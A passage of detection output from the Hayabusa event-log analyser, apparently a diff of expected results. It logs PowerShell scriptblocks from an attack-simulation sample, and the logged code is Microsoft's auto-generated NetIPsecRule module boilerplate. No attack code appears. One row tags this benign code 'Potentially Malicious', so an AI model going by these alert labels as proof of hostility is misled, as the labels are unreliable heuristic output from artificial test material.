$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPsecRuleName')) { [object]$__cmdletization_value = ${IPsecRuleName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSe",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.080 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"t')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecRule' -Alias '*' function Show-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.080 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"t')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 